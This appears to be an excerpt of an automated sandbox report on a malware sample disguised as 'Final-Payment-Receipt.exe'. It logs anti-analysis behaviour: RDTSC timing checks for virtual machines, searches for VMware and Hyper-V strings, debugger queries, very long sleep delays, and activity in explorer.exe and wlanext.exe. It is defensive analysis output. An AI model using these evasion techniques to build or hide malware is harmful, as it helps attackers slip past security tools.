          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000002EB98E4 second address: 0000000002EB98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 0000000002EB9B5E second address: 0000000002EB9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe TID: 5772Thread sleep time: -52501s >= -30000s
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exe TID: 6088Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 4568Thread sleep count: 39 > 30
          Source: C:\Windows\explorer.exe TID: 4568Thread sleep time: -78000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 5456Thread sleep time: -75000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: explorer.exe, 00000002.00000000.246034971.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.236884381.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
          Source: explorer.exe, 00000002.00000002.494413702.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000002.00000000.241386939.00000000053A0000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}F4
          Source: explorer.exe, 00000002.00000002.490839971.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000002.00000002.499236558.00000000053A0000.00000004.00000001.sdmpBinary or memory string: AF_UNIXa0%SystemRoot%\system32\mswsock.dll-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Vir
          Source: explorer.exe, 00000002.00000000.246079624.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000002.499263196.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000002.00000000.246079624.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: Final-Payment-Receipt.exe, 00000000.00000002.232793282.00000000023F7000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000002.00000000.245755606.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014441E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4190 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014749A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014369A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014351BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013CB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01472073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01481074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01437016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01437016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01437016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01484015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01484015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0144B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01433884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01433884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01488B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014353CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014623E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014623E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_014623E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DEB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DEB9A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013EB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013C1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0146D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01485BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013E53C5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DB236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0147EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01444257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013F4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013DA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013D3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0146B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_0146B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_01488A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013B5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Final-Payment-Receipt.exeCode function: 1_2_013BAA16 mov eax, dword ptr fs:[00000030h]
